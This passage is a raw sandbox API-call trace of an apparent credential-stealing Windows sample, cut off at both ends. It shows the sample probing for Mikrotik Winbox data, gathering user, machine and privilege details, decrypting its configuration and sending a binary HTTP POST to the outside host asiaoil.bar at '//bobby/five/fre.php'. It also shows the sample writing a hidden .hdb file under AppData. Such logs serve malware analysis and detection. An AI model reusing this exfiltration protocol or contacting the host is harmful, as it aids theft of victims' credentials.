(in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0256.932] GetProcessHeap () returned 0x740000 [0256.932] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0256.932] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0256.933] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0256.933] GetProcessHeap () returned 0x740000 [0256.933] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f5e) returned 0x75ca78 [0256.934] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0256.934] wvsprintfW (in: param_1=0x75ca78, param_2="Mikrotik\\Winbox", arglist=0x19fb5c | out: param_1="Mikrotik\\Winbox") returned 15 [0256.934] GetProcessHeap () returned 0x740000 [0256.935] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x22) returned 0x758778 [0257.013] GetProcessHeap () returned 0x740000 [0257.013] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75ca78 | out: hHeap=0x740000) returned 1 [0257.014] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0257.014] PathFileExistsW (pszPath="Mikrotik\\Winbox") returned 0 [0257.015] GetProcessHeap () returned 0x740000 [0257.015] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0257.015] GetProcessHeap () returned 0x740000 [0257.016] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758778 | out: hHeap=0x740000) returned 1 [0257.016] GetProcessHeap () returned 0x740000 [0257.016] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0257.017] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0257.017] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0257.017] GetProcessHeap () returned 0x740000 [0257.017] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f4a) returned 0x75ca78 [0257.018] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0257.019] wvsprintfW (in: param_1=0x75ca78, param_2="%s\\%s", arglist=0x19f994 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9") returned 44 [0257.019] GetProcessHeap () returned 0x740000 [0257.019] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x5c) returned 0x75a7c8 [0257.019] GetProcessHeap () returned 0x740000 [0257.019] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75ca78 | out: hHeap=0x740000) returned 1 [0257.021] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9")) returned 0xffffffff [0257.021] CreateDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9"), lpSecurityAttributes=0x0) returned 1 [0257.023] GetProcessHeap () returned 0x740000 [0257.023] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f50) returned 0x75ca78 [0257.024] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0257.025] wvsprintfW (in: param_1=0x75ca78, param_2="%s\\%s.%s", arglist=0x19f9a8 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.hdb") returned 55 [0257.025] GetProcessHeap () returned 0x740000 [0257.025] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x72) returned 0x757198 [0257.025] GetProcessHeap () returned 0x740000 [0257.025] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75ca78 | out: hHeap=0x740000) returned 1 [0257.025] GetProcessHeap () returned 0x740000 [0257.025] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a7c8 | out: hHeap=0x740000) returned 1 [0257.145] GetProcessHeap () returned 0x740000 [0257.145] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0257.146] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.hdb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9\\9bdc8a.hdb"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0257.147] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x1f0000 [0257.148] GetProcessHeap () returned 0x740000 [0257.148] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757198 | out: hHeap=0x740000) returned 1 [0257.149] GetProcessHeap () returned 0x740000 [0257.149] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1388) returned 0x75ca78 [0257.149] GetProcessHeap () returned 0x740000 [0257.149] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xc) returned 0x74b920 [0257.149] GetProcessHeap () returned 0x740000 [0257.149] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x11c) returned 0x75a7c8 [0257.150] RtlGetVersion (in: lpVersionInformation=0x75a7c8 | out: lpVersionInformation=0x75a7c8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 0x0 [0257.150] GetProcessHeap () returned 0x740000 [0257.151] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a7c8 | out: hHeap=0x740000) returned 1 [0257.151] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19fb18 | out: lpSystemTimeAsFileTime=0x19fb18*(dwLowDateTime=0x5aafe4d7, dwHighDateTime=0x1d81e4a)) [0257.151] GetProcessHeap () returned 0x740000 [0257.151] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7) returned 0x75b5d0 [0257.151] GetProcessHeap () returned 0x740000 [0257.151] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1a5) returned 0x75a488 [0257.152] GetProcessHeap () returned 0x740000 [0257.152] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xa0000) returned 0xf54020 [0257.855] GetProcessHeap () returned 0x740000 [0257.859] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0xf54020 | out: hHeap=0x740000) returned 1 [0257.863] GetProcessHeap () returned 0x740000 [0257.863] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75b6c0 [0257.864] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0257.864] GetUserNameW (in: lpBuffer=0x75b6c0, pcbBuffer=0x19fb74 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x19fb74) returned 1 [0257.866] GetProcessHeap () returned 0x740000 [0257.867] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0257.867] GetProcessHeap () returned 0x740000 [0257.867] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75b6c0 [0257.867] GetComputerNameW (in: lpBuffer=0x75b6c0, nSize=0x19fb74 | out: lpBuffer="XC64ZB", nSize=0x19fb74) returned 1 [0257.867] GetProcessHeap () returned 0x740000 [0257.868] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0257.868] GetCurrentThread () returned 0xfffffffe [0257.869] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0257.870] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=1, TokenHandle=0x19fb74 | out: TokenHandle=0x19fb74*=0x0) returned 0 [0257.870] GetLastError () returned 0x3f0 [0257.870] GetCurrentProcess () returned 0xffffffff [0257.871] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0257.871] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x19fb74 | out: TokenHandle=0x19fb74*=0x210) returned 1 [0257.871] GetProcessHeap () returned 0x740000 [0257.871] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75b6c0 [0257.871] GetProcessHeap () returned 0x740000 [0257.871] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75c1a8 [0257.872] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0257.872] GetTokenInformation (in: TokenHandle=0x210, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x19fb70 | out: TokenInformation=0x0, ReturnLength=0x19fb70) returned 0 [0257.872] GetProcessHeap () returned 0x740000 [0257.872] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758688 [0257.873] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0257.874] GetTokenInformation (in: TokenHandle=0x210, TokenInformationClass=0x1, TokenInformation=0x758688, TokenInformationLength=0x24, ReturnLength=0x19fb70 | out: TokenInformation=0x758688, ReturnLength=0x19fb70) returned 1 [0257.874] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0257.875] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x758690*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)), Name=0x75b6c0, cchName=0x19fb60, ReferencedDomainName=0x75c1a8, cchReferencedDomainName=0x19fb64, peUse=0x19fb5c | out: Name="RDhJ0CNFevzX", cchName=0x19fb60, ReferencedDomainName="XC64ZB", cchReferencedDomainName=0x19fb64, peUse=0x19fb5c) returned 1 [0257.877] GetProcessHeap () returned 0x740000 [0257.877] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f44) returned 0x75ee48 [0257.877] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0257.878] wvsprintfW (in: param_1=0x75ee48, param_2="%s", arglist=0x19fb4c | out: param_1="XC64ZB") returned 6 [0257.878] GetProcessHeap () returned 0x740000 [0257.878] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x74b7e8 [0257.878] GetProcessHeap () returned 0x740000 [0257.879] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75ee48 | out: hHeap=0x740000) returned 1 [0257.879] GetProcessHeap () returned 0x740000 [0257.879] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758688 | out: hHeap=0x740000) returned 1 [0257.879] CloseHandle (hObject=0x210) returned 1 [0257.879] GetProcessHeap () returned 0x740000 [0257.879] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c1a8 | out: hHeap=0x740000) returned 1 [0257.879] GetProcessHeap () returned 0x740000 [0257.879] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0257.879] GetProcessHeap () returned 0x740000 [0257.879] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x74b7e8 | out: hHeap=0x740000) returned 1 [0257.880] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0257.881] GetDesktopWindow () returned 0x10010 [0258.027] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0258.028] GetWindowRect (in: hWnd=0x10010, lpRect=0x19fb68 | out: lpRect=0x19fb68) returned 1 [0258.029] GetProcessHeap () returned 0x740000 [0258.037] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x8) returned 0x75b620 [0258.037] GetProcessHeap () returned 0x740000 [0258.037] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b620 | out: hHeap=0x740000) returned 1 [0258.038] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0258.039] GetUserNameW (in: lpBuffer=0x19f968, pcbBuffer=0x19fb70 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x19fb70) returned 1 [0258.040] LoadLibraryW (lpLibFileName="NETAPI32") returned 0x755e0000 [0258.044] GetProcAddress (hModule=0x755e0000, lpProcName="NetUserGetInfo") returned 0x67df33a0 [0258.423] NetUserGetInfo (in: servername=0x0, username="RDhJ0CNFevzX", level=0x1, bufptr=0x19fb74 | out: bufptr=0x7544a8*(usri1_name="RDhJ0CNFevzX", usri1_password=0x0, usri1_password_age=0xc459bc, usri1_priv=0x2, usri1_home_dir="", usri1_comment="", usri1_flags=0x10201, usri1_script_path="")) returned 0x0 [0258.729] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0258.729] AllocateAndInitializeSid (in: pIdentifierAuthority=0x19fb60, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x19fb68 | out: pSid=0x19fb68*=0x74b950*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0258.730] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0258.730] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x74b950*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x19fb6c | out: IsMember=0x19fb6c) returned 1 [0258.731] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0258.732] GetNativeSystemInfo (in: lpSystemInfo=0x19fb44 | out: lpSystemInfo=0x19fb44*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0258.732] GetProcessHeap () returned 0x740000 [0258.732] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x754190 [0258.732] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0258.733] CryptAcquireContextW (in: phProv=0x19f920, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f920*=0x0) returned 0 [0258.929] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0258.930] CryptAcquireContextW (in: phProv=0x19f920, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f920*=0x75a7c8) returned 1 [0259.255] GetProcessHeap () returned 0x740000 [0259.255] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758688 [0259.256] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0259.256] CryptImportKey (in: hProv=0x75a7c8, pbData=0x758688, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f924 | out: phKey=0x19f924*=0x74d728) returned 1 [0259.258] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0259.258] CryptSetKeyParam (hKey=0x74d728, dwParam=0x4, pbData=0x19f91c*=0x1, dwFlags=0x0) returned 1 [0259.259] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0259.259] CryptSetKeyParam (hKey=0x74d728, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0259.259] GetProcessHeap () returned 0x740000 [0259.260] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758688 | out: hHeap=0x740000) returned 1 [0259.260] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0259.261] CryptDecrypt (in: hKey=0x74d728, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x754190, pdwDataLen=0x19f974 | out: pbData=0x754190, pdwDataLen=0x19f974) returned 1 [0259.265] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0259.265] CryptDestroyKey (hKey=0x74d728) returned 1 [0259.266] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0259.267] CryptReleaseContext (hProv=0x75a7c8, dwFlags=0x0) returned 1 [0259.267] GetProcessHeap () returned 0x740000 [0259.267] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x75f488 [0259.267] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0259.268] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="http://") returned 0x0 [0259.269] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0259.269] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="https://") returned 0x0 [0259.270] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0259.271] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="/") returned="//bobby/five/fre.php" [0259.271] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0259.272] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch=":") returned 0x0 [0259.272] GetProcessHeap () returned 0x740000 [0259.272] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bdc8 [0259.272] getaddrinfo (in: pNodeName="asiaoil.bar", pServiceName="80", pHints=0x19f930*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f950 | out: ppResult=0x19f950*=0x75bff8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75bee0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c328*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) returned 0 [0264.982] GetProcessHeap () returned 0x740000 [0264.982] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b650 [0264.982] socket (af=2, type=1, protocol=6) returned 0x264 [0264.984] connect (s=0x264, name=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), namelen=16) returned 0 [0265.019] FreeAddrInfoW (pAddrInfo=0x75bff8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75bee0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c328*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) [0265.019] GetProcessHeap () returned 0x740000 [0265.019] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7d) returned 0x761e60 [0265.020] GetProcessHeap () returned 0x740000 [0265.020] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x201b) returned 0x764640 [0265.021] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0265.022] wvsprintfA (in: param_1=0x764640, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f958 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 178 [0265.023] GetProcessHeap () returned 0x740000 [0265.023] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x761ee8 [0265.023] GetProcessHeap () returned 0x740000 [0265.023] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x764640 | out: hHeap=0x740000) returned 1 [0265.023] GetProcessHeap () returned 0x740000 [0265.023] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x763ed8 [0265.023] GetProcessHeap () returned 0x740000 [0265.023] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1fdc) returned 0x764640 [0265.024] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0265.025] wvsprintfA (in: param_1=0x764640, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f958 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 579BFA72\r\nContent-Length: 288\r\nConnection: close\r\n\r\n") returned 243 [0265.025] GetProcessHeap () returned 0x740000 [0265.025] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf5) returned 0x761fa8 [0265.025] GetProcessHeap () returned 0x740000 [0265.026] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x764640 | out: hHeap=0x740000) returned 1 [0265.026] send (s=0x264, buf=0x761fa8*, len=243, flags=0) returned 243 [0265.028] send (s=0x264, buf=0x75ca78*, len=288, flags=0) returned 288 [0265.028] GetProcessHeap () returned 0x740000 [0265.028] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xfd0) returned 0x764640 [0265.028] recv (in: s=0x264, buf=0x764640, len=4048, flags=0 | out: buf=0x764640*) returned 569 [0265.162] GetProcessHeap () returned 0x740000 [0265.162] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x761fa8 | out: hHeap=0x740000) returned 1 [0265.162] GetProcessHeap () returned 0x740000 [0265.163] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763ed8 | out: hHeap=0x740000) returned 1 [0265.163] GetProcessHeap () returned 0x740000 [0265.163] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x761ee8 | out: hHeap=0x740000) returned 1 [0265.163] GetProcessHeap () returned 0x740000 [0265.164] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x761e60 | out: hHeap=0x740000) returned 1 [0265.164] closesocket (s=0x264) returned 0 [0265.165] GetProcessHeap () returned 0x740000 [0265.165] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b650 | out: hHeap=0x740000) returned 1 [0265.165] GetProcessHeap () returned 0x740000 [0265.165] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75f488 | out: hHeap=0x740000) returned 1 [0265.165] GetProcessHeap () returned 0x740000 [0265.165] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x754190 | out: hHeap=0x740000) returned 1 [0265.165] GetProcessHeap () returned 0x740000 [0265.166] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdc8 | out: hHeap=0x740000) returned 1 [0265.166] GetProcessHeap () returned 0x740000 [0265.166] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75f488 [0265.167] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0265.167] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x75f488 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0265.167] GetProcessHeap () returned 0x740000 [0265.168] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f4a) returned 0x765618 [0265.169] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0265.170] wvsprintfW (in: param_1=0x765618, param_2="%s\\%s", arglist=0x19f988 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9") returned 44 [0265.170] GetProcessHeap () returned 0x740000 [0265.170] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x5c) returned 0x7631b8 [0265.170] GetProcessHeap () returned 0x740000 [0265.170] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x765618 | out: hHeap=0x740000) returned 1 [0265.171] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9")) returned 0x10 [0265.171] GetProcessHeap () returned 0x740000 [0265.171] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f50) returned 0x765618 [0265.172] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0265.173] wvsprintfW (in: param_1=0x765618, param_2="%s\\%s.%s", arglist=0x19f99c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.hdb") returned 55 [0265.173] GetProcessHeap () returned 0x740000 [0265.173] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x72) returned 0x757a98 [0265.173] GetProcessHeap () returned 0x740000 [0265.173] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x765618 | out: hHeap=0x740000) returned 1 [0265.174] GetProcessHeap () returned 0x740000 [0265.174] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7631b8 | out: hHeap=0x740000) returned 1 [0265.174] GetProcessHeap () returned 0x740000 [0265.175] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75f488 | out: hHeap=0x740000) returned 1 [0265.176] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x19fb34, dwLength=0x1c | out: lpBuffer=0x19fb34*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0265.177] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x19fb14, dwLength=0x1c | out: lpBuffer=0x19fb14*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0265.178] VirtualAlloc (lpAddress=0x0, dwSize=0x1004, flAllocationType=0x3000, flProtect=0x4) returned 0x6c0000 [0265.180] VirtualFree (lpAddress=0x1f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0265.181] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.hdb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9\\9bdc8a.hdb")) returned 0 [0265.181] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.hdb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9\\9bdc8a.hdb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0265.183] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0265.184] WriteFile (in: hFile=0x264, lpBuffer=0x6c0000*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x19fb3c, lpOverlapped=0x0 | out: lpBuffer=0x6c0000*, lpNumberOfBytesWritten=0x19fb3c*=0x4, lpOverlapped=0x0) returned 1 [0265.187] CloseHandle (hObject=0x264) returned 1 [0265.188] GetProcessHeap () returned 0x740000 [0265.188] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757a98 | out: hHeap=0x740000) returned 1 [0265.189] GetProcessHeap () returned 0x740000 [0265.189] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x764640 | out: hHeap=0x740000) returned 1 [0265.189] GetProcessHeap () returned 0x740000 [0265.189] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0265.189] GetProcessHeap () returned 0x740000 [0265.190] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75ca78 | out: hHeap=0x740000) returned 1 [0265.190] GetProcessHeap () returned 0x740000 [0265.190] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x74b920 | out: hHeap=0x740000) returned 1 [0265.190] GetProcessHeap () returned 0x740000 [0265.190] HeapFree (in: 